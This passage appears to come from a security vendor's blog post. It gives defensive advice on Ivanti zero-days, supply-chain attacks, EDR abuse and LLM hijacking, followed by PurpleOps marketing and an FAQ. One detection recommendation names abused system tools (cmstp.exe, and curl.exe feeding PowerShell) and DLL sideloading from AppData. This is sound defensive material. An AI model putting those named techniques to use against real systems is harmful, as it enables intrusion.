  • Vulnerability and Patch Management: Promptly apply security updates for critical software, especially for zero-day vulnerabilities like the Ivanti CVEs; for edge appliances that were exposed while vulnerable, run the vendor's integrity check (Ivanti's ICT) and follow its guidance to factory reset before upgrading, since patching a compromised device does not evict the attacker. Regular scanning of external and internal systems for exposed vulnerabilities is essential. For cloud environments, implement Service Control Policies (SCPs) that restrict access to sensitive services like Bedrock models to specific, authorised principals, because an SCP deny holds even when an attacker has granted themselves permissions inside the account.
  • Supply Chain Security: Institute rigorous validation processes for all third-party components and dependencies, particularly within software development and CI/CD pipelines. This includes scrutinizing bundled dependencies in software packages, such as those found in node_modules, to identify any hidden malicious modifications. Organizations should develop internal standards for supply-chain information security.
  • Advanced Threat Detection and Response: Move beyond signature-based detection to behavioural analytics. Monitor for signed binaries, security agents included, executing from user-writable locations such as AppData and loading DLLs from the same directory; for Living Off the Land Binaries (LOLBINs) like cmstp.exe or curl.exe spawned in unexpected process chains or feeding content into PowerShell; and for suspicious or denied API calls within cloud environments, since a burst of AccessDenied errors from a newly created principal is often the first visible sign of a compromised key. Proactive breach detection capabilities are fundamental for identifying sophisticated intrusions that mimic legitimate activity.
  • Identity and Access Management (IAM): Adhere strictly to the principle of least privilege for all IAM users and roles in cloud and on-premises environments. Implement regular audits of access keys, permissions, and user activity. Enforce strong authentication mechanisms, including multi-factor authentication (MFA), to mitigate the impact of compromised credentials.
  • Threat Intelligence Integration: Integrate comprehensive threat intelligence feeds into security operations. This includes consuming IOCs, Tactics, Techniques, and Procedures (TTPs) for newly discovered vulnerabilities and active campaigns. Understanding how threat actors share information and tools through channels visible to dark web monitoring service and underground forum intelligence provides critical context for proactive defense.

PurpleOps: Comprehensive Security in a Complex Threat Environment

Organizations require sophisticated tools and expert insights to defend against threats such as the Ivanti 0-days, intricate supply chain attacks, the abuse of EDR processes, and LLM hijacking. PurpleOps delivers a cyber threat intelligence platform engineered to provide organizations with relevant and timely insights into these and other complex threats.

Our platform incorporates real-time ransomware intelligence and offers a live ransomware API for swift and informed responses to emergent ransomware threats. PurpleOps integrates dark web monitoring service, telegram threat monitoring, and underground forum intelligence to provide early warnings and contextual understanding of threat actor methodologies, enabling the identification of precursor activities and potential targeting.

Specialized supply-chain risk monitoring capabilities assist in securing development pipelines and third-party dependencies against attacks similar to those observed in VS Code and Ultralytics. Our breach detection services are designed to identify subtle anomalies, recognizing sophisticated tactics like DLL sideloading and fileless attacks that evade traditional defenses. We also provide brand leak alerting to safeguard digital assets and maintain reputational integrity.

PurpleOps’ expertise extends to proactive security measures through red-team operations and penetration testing, designed to uncover weaknesses before adversaries exploit them. Our tailored supply-chain information security and protect-ransomware services offer comprehensive defense strategies against the most pressing cyber risks. With PurpleOps, organizations gain enhanced visibility and a strategic advantage against current and future cyber threats.

To understand how PurpleOps can enhance your organization’s cybersecurity posture against these and other advanced threats, explore our platform and PurpleOps Solutions, or contact us for a detailed discussion.

Frequently Asked Questions (FAQ)

What are CVE-2025-0282 and CVE-2025-0283?

These are two stack-based buffer overflows affecting Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA Gateways. CVE-2025-0282 is unauthenticated and gives remote code execution; it was exploited in the wild as a zero-day from mid-December 2024. CVE-2025-0283 allows a local authenticated attacker to escalate privileges and had no confirmed in-the-wild exploitation at disclosure, but it is fixed by the same update and should be patched at the same time.

Which Ivanti products are affected by these vulnerabilities?

The vulnerabilities affect Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA Gateways across specific versions. For CVE-2025-0282, Ivanti Connect Secure versions 22.7R2-22.7R2.4, Ivanti Policy Secure 22.7R1-22.7R1.2, and Ivanti Neurons for ZTA Gateways 22.7R2-22.7R2.3 are impacted. CVE-2025-0283 affects Connect Secure 22.7R2.4 and prior / 9.1R18.9 and prior, Policy Secure 22.7R1.2 and prior, and Neurons for ZTA Gateways 22.7R2.3 and prior.

What are some examples of the evolving threat environment?

Beyond direct exploitation, the threat landscape includes sophisticated supply chain attacks (e.g., malicious VS Code extensions, compromised Ultralytics AI library), abuse of legitimate security tools (e.g., Storm-0249 using DLL sideloading with SentinelOne components), and attacks targeting emerging technologies like LLMs in cloud environments (e.g., JINX-2401 attempting to hijack AWS Bedrock models).

How can organizations defend against these advanced threats?

A multi-layered approach is crucial, involving prompt vulnerability and patch management, robust supply chain security, advanced behavioral threat detection, strict Identity and Access Management (IAM) with least privilege, and continuous integration of comprehensive threat intelligence into security operations.

How does PurpleOps help organizations in this threat landscape?

PurpleOps provides a comprehensive cyber threat intelligence platform, real-time ransomware intelligence, dark web and underground forum monitoring, supply-chain risk monitoring, breach detection, and brand leak alerting services. Additionally, they offer red-team operations, penetration testing, tailored supply-chain information security, and protect-ransomware services to enhance an organization’s overall cybersecurity posture.